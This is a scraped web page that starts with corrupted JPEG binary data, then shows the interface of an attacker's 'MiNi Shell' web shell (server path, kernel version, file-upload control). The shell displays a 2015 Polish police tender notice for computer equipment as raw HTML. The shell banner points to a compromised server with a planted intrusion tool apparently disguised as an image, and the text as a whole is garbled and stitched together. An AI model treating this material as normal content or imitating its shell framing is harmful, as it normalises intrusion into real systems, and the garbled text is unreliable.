JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150722/185644-N-2015.html

<p class="kh_header"><b>Rzeszów: Zakup sprzętu komputerowego dla Komendy Powiatowej Policji w Łańcucie - pierwsze wyposażenie, numer postępowania: ZP/32/2015</b><br>
<b>Numer ogłoszenia: 185644 - 2015; data zamieszczenia: 22.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Dąbrowskiego 30, 35-036 Rzeszów, woj. podkarpackie, tel. 017 8582192, faks 017 8582193.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podkarpacka.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu komputerowego dla Komendy Powiatowej Policji w Łańcucie - pierwsze wyposażenie, numer postępowania: ZP/32/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia  jest dostawa sprzętu komputerowego z oprogramowaniem dla Komendy Powiatowej Policji w Łańcucie.

2.Zamawiający wymaga aby dostarczony sprzęt komputerowy był wyprodukowany po 1 stycznia 2015 roku.
3.  W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w opisie przedmiotu zamówienia , Zamawiający żąda, aby Wykonawca przedłożył wraz z ofertą:
a)  certyfikat na system zarządzania jakością zgodny z wymogami normy ISO-9001 lub równoważny, 
 b)  dokument potwierdzający zgodność oferowanych stanowisk komputerowych z normą    Energy Star w wersji co najmniej 5.0, 
c) certyfikat WHQL dla systemu MS Windows 7, 8 dla oferowanych stanowisk komputerowych oraz komputerów przenośnych.

4. Dokumenty potwierdzające spełnianie wymogu muszą  zostać dołączone do ofert 
w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę.
5.Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 1 do SIWZ.
6. Na dostarczony  sprzęt komputerowy Wykonawca udzieli  minimum:
- 12 miesięcy gwarancji na: czytnik kart mikroprocesorowych USB, projektor      multimedialny z ekranem, skaner
- 24 miesięcy gwarancji na: komputer PC z oprogramowaniem (pakietem biurowym), monitor LCD 21,5, komputer przenośny z oprogramowaniem (pakietem biurowym), urządzenie wielofunkcyjne formatu A3, drukarki laserowe sieciowe (kolor, mono)
licząc od dnia podpisania protokołu odbioru ilościowego.
7.Tam, gdzie w opisie przedmiotu zamówienia zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) asortymentu lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 30 ust. 1-3 ustawy Pzp, Zamawiający dopuszcza oferowanie asortymentu lub rozwiązań równoważnych pod warunkiem, że zagwarantują one realizację dostawy oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w opisie przedmiotu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.13.00-0, 30.21.31.00-6, 30.23.21.10-8, 30.21.61.10-0, 35.12.60.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowania, którego wzór stanowi Załącznik nr 4 do SIWZ.  Zamawiający dokona oceny spełniania ww. warunku na podstawie ww. oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę sprzętu  komputerowego  o wartości nie mniejszej niż 150 000 PLN brutto.
            
 Zamawiający dokona oceny spełniania ww. warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, którego wzór stanowi Załącznik nr 4 do SIWZ  oraz  dokumentu  określonego sekcji III.4.1) niniejszego ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowania, którego wzór stanowi Załącznik nr 4 do SIWZ.  Zamawiający dokona oceny spełniania ww. warunku na podstawie ww. oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowania, którego wzór stanowi Załącznik nr 4 do SIWZ.  Zamawiający dokona oceny spełniania ww. warunku na podstawie ww. oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowania, którego wzór stanowi Załącznik nr 4 do SIWZ.  Zamawiający dokona oceny spełniania ww. warunku na podstawie ww. oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający na podstawie § 1 ust. 4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., poz. 231) wymaga, aby Wykonawca w wykazie dostaw wykazał, tylko te dostawy, które odpowiadają rodzajem i wartością przedmiotowi zamówienia. Do tych dostaw Wykonawca złoży dowody, określające, czy te dostawy zostały wykonane w sposób należyty. 

Dowodami, o których mowa powyżej są:
a) poświadczenia, z tym, że w odniesieniu do nadal wykonywanych dostaw  okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
b) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w lit. a).
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
W razie konieczności, szczególnie, gdy wykaz lub dowody, o których mowa powyżej, budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego dostawy były wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym 
w opisie przedmiotu zamówienia , Zamawiający żąda, aby Wykonawca przedłożył wraz  z ofertą:
a)  certyfikat na system zarządzania jakością zgodny z wymogami normy ISO-9001 lub równoważny, 
   b)  dokument potwierdzający zgodność oferowanych stanowisk komputerowych z normą    Energy Star w wersji co najmniej 5.0, 
c) certyfikat WHQL dla systemu MS Windows 7, 8 dla oferowanych stanowisk komputerowych oraz komputerów przenośnych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, wówczas ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:
1)warunki opisane w rozdziale V pkt 1 SIWZ spełniają łącznie,
2)warunek dotyczący, potwierdzenia braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp spełniają każdy z osobna.
3.Zgodnie z art. 26 ust. 2b ustawy Pzp Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
4. Zobowiązanie podmiotu trzeciego, musi przybierać formę pisemną i nie jest dopuszczalna inna forma, w tym kopia dokumentu potwierdzona za zgodność 
z oryginałem. Jedynie złożenie oryginału dokumentu zawierającego podpis osoby pod treścią oświadczenia spełnia wymóg formy pisemnej zobowiązania, określonej w art. 26 ust. 2b ustawy Pzp.
5.Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2 b ustawy Pzp, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nie udostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.

6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz     w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust 2 b ustawy Pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.

UWAGA!

7. Jeżeli Wykonawca wykazując spełnianie warunków o których mowa w art. 22 
ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust.  2 b ustawy Pzp, Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należnego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów,  żąda dokumentów dotyczących w szczególności:
1) zakresu dostępnych Wykonawcy zasobów innego podmiotu,
2) sposobu  wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
3) charakteru stosunku jaki  będzie łączył Wykonawcę z innym podmiotem, 
4) zakresu okresu  udziału innego podmiotu przy wykonaniu zamówienia.

8.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w sekcji III.4.2) tiret 2 niniejszego ogłoszenia składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument ten, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa 
w punkcie 8 niniejszej sekcji, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub notariuszem.
10.W przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
11.Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i załączonych do oferty dokumentów.
12.Wszelkie oświadczenia należy złożyć w oryginale. Dokumenty mają być złożone 
w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
13.Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
14.Złożone oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert.
15. Zasady udziału podmiotów występujących wspólnie, w tym spółek cywilnych:
1)Zamawiający wymaga, w oparciu o art. 23 ust. 2 ustawy Pzp, dołączenia do oferty dokumentu pełnomocnictwa do reprezentacji w postępowaniu o udzielenie zamówienia publicznego udzielonego podmiotowi wiodącemu przez wszystkie podmioty występujące wspólnie (także przez przedsiębiorców spółki cywilnej, chyba, że ofertę i wszystkie dokumenty składane z ofertą przez spółkę cywilną podpiszą wszyscy jej wspólnicy i wszyscy wspólnicy złożą odrębne oświadczenia
o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp  (Załącznik nr 4 do SIWZ), o braku podstaw do wykluczenia z art. 24 ust. 1 ustawy Pzp(Załącznik nr 5 do SIWZ) i informację dotyczącą przynależności do grupy kapitałowej) obejmującego upoważnienie do złożenia oferty albo do złożenia oferty i podpisania umowy w imieniu i na rzecz podmiotów występujących wspólnie. Jeżeli pełnomocnik w imieniu mocodawców podpisuje także oświadczenie wiedzy 
o spełnianiu warunków udziału w postępowaniu, w tym określone w art. 22 ust. 1 ustawy Pzp, oświadczenie o braku podstaw do wykluczenia  z postępowania o udzielenie zamówienia publicznego z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp oraz informację dotyczącą przynależności do grupy kapitałowej udzielone pełnomocnictwo ma zawierać umocowanie do złożenia oświadczeń w tym zakresie,
2)każdy członek podmiotu występującego wspólnie jest obowiązany do złożenia odrębnego oświadczenia o braku podstaw do wykluczenia z art. 24 ust. 1 ustawy Pzp (Załącznik nr 5 do SIWZ) i informacji/listy dotyczącej przynależności do grupy kapitałowej, w sposób określony do reprezentacji tego podmiotu oraz dokumenty potwierdzające brak podstaw do wykluczenia na podstawie art. 24 ust. 1 wskazane
 w sekcji III.4.2) tiret 2 niniejszego ogłoszenia, 
3)w przypadku oferty wspólnej na formularzu ofertowym należy wymienić z nazwy 
z podaniem adresu wszystkie podmioty ubiegające się o wspólne udzielenie niniejszego zamówienia - z zaznaczeniem lidera/pełnomocnika, 
4)wszelka korespondencja między Zamawiającym a Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia będzie kierowana do ustanowionego pełnomocnika ze skutkiem mocodawców.
16.Jeżeli Wykonawcę w toku postępowania reprezentuje pełnomocnik, pełnomocnictwo musi mieć formę oryginału lub kopii potwierdzonej notarialnie. Dokument udzielonego pełnomocnictwa należy dołączyć do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji na zaoferowany asortyment - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W oparciu o art. 144 ust. 1 ustawy Prawo Zamówień publicznych, Zamawiający dopuszcza zmianę istotnych postanowień umowy, w następujących przypadkach:
1)gdy powstała możliwość zaoferowania nowszych i korzystniejszych dla Zamawiającego rozwiązań technologicznych i technicznych niż te istniejące w dniu zawarcia umowy,
2)gdy nastąpiła zmiana aktów prawnych obowiązujących w dacie zawarcia umowy.
2.Zmiana zapisów umowy jest możliwa tylko za zgodą Zamawiającego. Zamawiający wymaga złożenia pisemnego uzasadnienia takiej zmiany.
3.Wystąpienie którejkolwiek z wymienionych w pkt 1 okoliczności nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania takich zmian, ani nie może stanowić podstawy roszczeń Wykonawcy do ich dokonania.
4.Wszelkie zmiany w umowie, opisane przez Zamawiającego muszą być dokonane na piśmie, w formie aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.podkarpacka.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Zamówień Publicznych, Komenda Wojewódzka Policji w Rzeszowie, ul. Dąbrowskiego 30, 35 - 036 Rzeszów, budynek C, pokój nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2015 godzina 10:00, miejsce: Sekcja Zamówień Publicznych, Komenda Wojewódzka Policji w Rzeszowie, ul. Dąbrowskiego 30, 35 - 036 Rzeszów, budynek C, pokój nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Kryteria oceny ofert i ich znaczenie:
- cena - 95 %
- okres gwarancji na zaoferowany asortyment - 5%.
